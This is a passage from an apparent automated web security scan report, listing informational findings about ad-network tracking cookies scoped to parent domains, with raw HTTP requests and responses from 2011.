Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 05:00:38 GMT
Location: \
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: srb=BAEAAAABIAMDPnJDTSAGYAsCLywEIAmACwAGIAcDAAAAAA==; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:00:38 GMT
Set-Cookie: oatmeal=10070:256698:477674:54816:0:1295977917:3|10489:276818:522556:54393:0:1296277238:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:00:38 GMT
Set-Cookie: adv_ic=ByAAAAD2nkNNIAYGAAFDAAACWyADIAtAAAFBd6AXBEkAALZRIB9AFCAAAT5yoBcgLwH8SOABFwHwcaAXIC8B+l3gARfgAy8BaF7gARcAZOACLwCr4AIXAD3gAl8AsOACFwBh4AIvAZlQ4AFH4AMvAeFZ4AEXAFjgAi/gA3cAVuACFwDkIKvA1wIes0DhAAcAqSDXAGAg60AAAFDgAi8Ei1wAAARAFCAAAr0NP+AALwAbIHcAdiATQAAATeACLwDVIC/BTwBL4AIXAdtX4AF3AErgAhcAGuACjwBB4AIXAD/hAgcAIOACFwB5Ia/AvwAd4AIXAMXgAi8AGOACF+EDT+ADFwFlOOABRwFc1aEHIIsAZOACFwCLwO8gFwTNTwAAA0DsIAAAVeACFwFHU+ABRwAm4AIXAA/gAo8AA+ACFwAY4AIXAf4MoU8gXwG3WuABRwDc4AIXAMbgAhcA2OACFwAo4AJHAMTgAhcAFeACFwCr4AIXAXlHwF8BAAA=; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:00:38 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:00:38 GMT
Keep-Alive: timeout=5, max=19972
Connection: Keep-Alive

10.97. http://media.fastclick.net/w/get.media previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/get.media

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

pjw=BAEAAAACIAMDqEZDTSAGAQABIAMCUjkEYAcCPPkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Sun, 30-Jan-2011 22:43:52 GMT
vt=10070:256698:477674:54816:0:1295925050:3|10489:276818:522556:54393:0:1296254632:0|; domain=.fastclick.net; path=/; expires=Sun, 27-Feb-2011 22:43:52 GMT
adv_ic=BxMAAACoRkNNIAYGAAFJAAACWyAHIAtAAAJc1UDgABcBZDjgARcBHrOgFwdDAACpSAAAYEAsIAACvQ0/gC8gFwQbWQAAdiATQAAAi8AXIF8EzU8AAANAFCAAAG3gAhcBdlzgAV8AVeACFwFHU+ABFwA34AIXAQZM4AEXADPgAhcB1kvgARcAJuACFwEPXuABFwAD4AIXABjgAhcB/gygvyCnAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwDV4ALXAMTgAhcAFeACLwCr4AIXAXlH4AF3AKjgAhcAoOACLwI7Pz6BZyCnQWcAkSFLAwAAAAA=; domain=.fastclick.net; path=/; expires=Sat, 28-Jan-2012 22:43:52 GMT
pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Sun, 27-Jan-2013 22:43:52 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/get.media?sid=54393&tp=5&d=j&t=n HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; vt=10070:256698:477674:54816:0:1295925050:3|10358:244443:513092:57358:0:1296072859:0|; pjw=BAMAAAACIAMDXNVATSAGCAABAQAA/EgCACAG4AAAAAMgCQHPpqAfICwAwCAP4AMfAAYgDwDHwB8gGATrdAIAUyATwAADBgAAAA==; adv_ic=ByoAAABc1UBNIAYGAAFJAABkOCAHIAtAAAGbgOABFwGpSOABFwEes6AXAEOAFwBgQCwgAAKSDT/gAEcBsF3gAS8AvcAXIC8EG1kAAHYgK0AAAI7AFyB3AJAgF8B3AIvgAhcEzU8AAANALCAAAHfgAhcAJyBpwC8AcuACFwD84AKnAG3gAhcBdlzgAS8AaOACFwDkIHvARwBi4AIXATte4AEXAF3gAhcBLlHgARcAWuACFwEbWOABFwBV4AIXAUdT4AEXAFDgAhcAo+ECHwBG4AIXAObgAhcAReACFwElW+ABRwA84AIXAPvgAl8AN+ACFwEGTOABLwAz4AIXAdZL4AEXAC/gAhcAnuACXwAu4AIXAB/hAgcAKuACFwA34AKnACbgAhcAD+ACLwAg4AIXAALgAl8AHOACFwFVWuABjwAW4AIXAQpQ4AEXAAPgAhcAGOACXwH+DOIBbwC34AJHANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwDV4gInAM/gAhcAZeMCFwDI4AIXAR9W4AGnAMTgAhcAFeACXwC/4AIXAD/gAhcAsOACFwHbV+ABRwCr4AIXAXlH4AEXAKjgAhcAoOACRwCA4AIXAMwiDwACIytAAAI7Pz4jJSA/IuNDdwCRIAsDAAAAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:43:52 GMT
Content-Type: application/x-javascript
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 405
Set-Cookie: pjw=BAEAAAACIAMDqEZDTSAGAQABIAMCUjkEYAcCPPkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Sun, 30-Jan-2011 22:43:52 GMT
Set-Cookie: vt=10070:256698:477674:54816:0:1295925050:3|10489:276818:522556:54393:0:1296254632:0|; domain=.fastclick.net; path=/; expires=Sun, 27-Feb-2011 22:43:52 GMT
Set-Cookie: adv_ic=BxMAAACoRkNNIAYGAAFJAAACWyAHIAtAAAJc1UDgABcBZDjgARcBHrOgFwdDAACpSAAAYEAsIAACvQ0/gC8gFwQbWQAAdiATQAAAi8AXIF8EzU8AAANAFCAAAG3gAhcBdlzgAV8AVeACFwFHU+ABFwA34AIXAQZM4AEXADPgAhcB1kvgARcAJuACFwEPXuABFwAD4AIXABjgAhcB/gygvyCnAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwDV4ALXAMTgAhcAFeACLwCr4AIXAXlH4AF3AKjgAhcAoOACLwI7Pz6BZyCnQWcAkSFLAwAAAAA=; domain=.fastclick.net; path=/; expires=Sat, 28-Jan-2012 22:43:52 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Sun, 27-Jan-2013 22:43:52 GMT

{var dz=document;
dz.writeln("<iframe src=\"http://view.atdmt.com/AVE/iview/286758469/direct;wi.728;hi.90/01/20110128224352/?click=http://media.fastclick.net/w/click.here?cid=276818;mid=522556;m=1;sid
...[SNIP]...

10.98. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://na.link.decdna.net
Path:	/n/49881/49889/www.247realmedia.com/1ykg1it

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

%2edecdna%2enet/%2fn%2f49881/2/e=1296224168/49881/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:08 GMT; path=/n/49881; domain=.decdna.net;
id=9286424825562137129; expires=Sat, 28-Jan-2012 14:16:08 GMT; path=/; domain=.decdna.net;
name=9286424825511805852; path=/; domain=.decdna.net;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /n/49881/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:16:08 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:16:08 GMT
location: http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced
Set-Cookie: %2edecdna%2enet/%2fn%2f49881/2/e=1296224168/49881/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:08 GMT; path=/n/49881; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286424825562137129; expires=Sat, 28-Jan-2012 14:16:08 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286424825511805852; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

10.99. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFL=011Pj2x3U10EfJ|U10Eo1|U10yOK|U1014lt|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/ HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:02:21 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFL=011Pj2x3U10EfJ|U10Eo1|U10yOK|U1014lt|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 414
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:21 GMT;path=/

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/434939665/UNKNOWN/USNetwork/BCN2010040564_000_EmpireState/1x1trans.gif/72634857383
...[SNIP]...

10.100. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

10.101. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O1012Mr|O1016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

10.102. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

10.103. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiQmF81012Mr|O1016GB; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y

Response

10.104. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

10.105. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

10.106. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

10.107. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
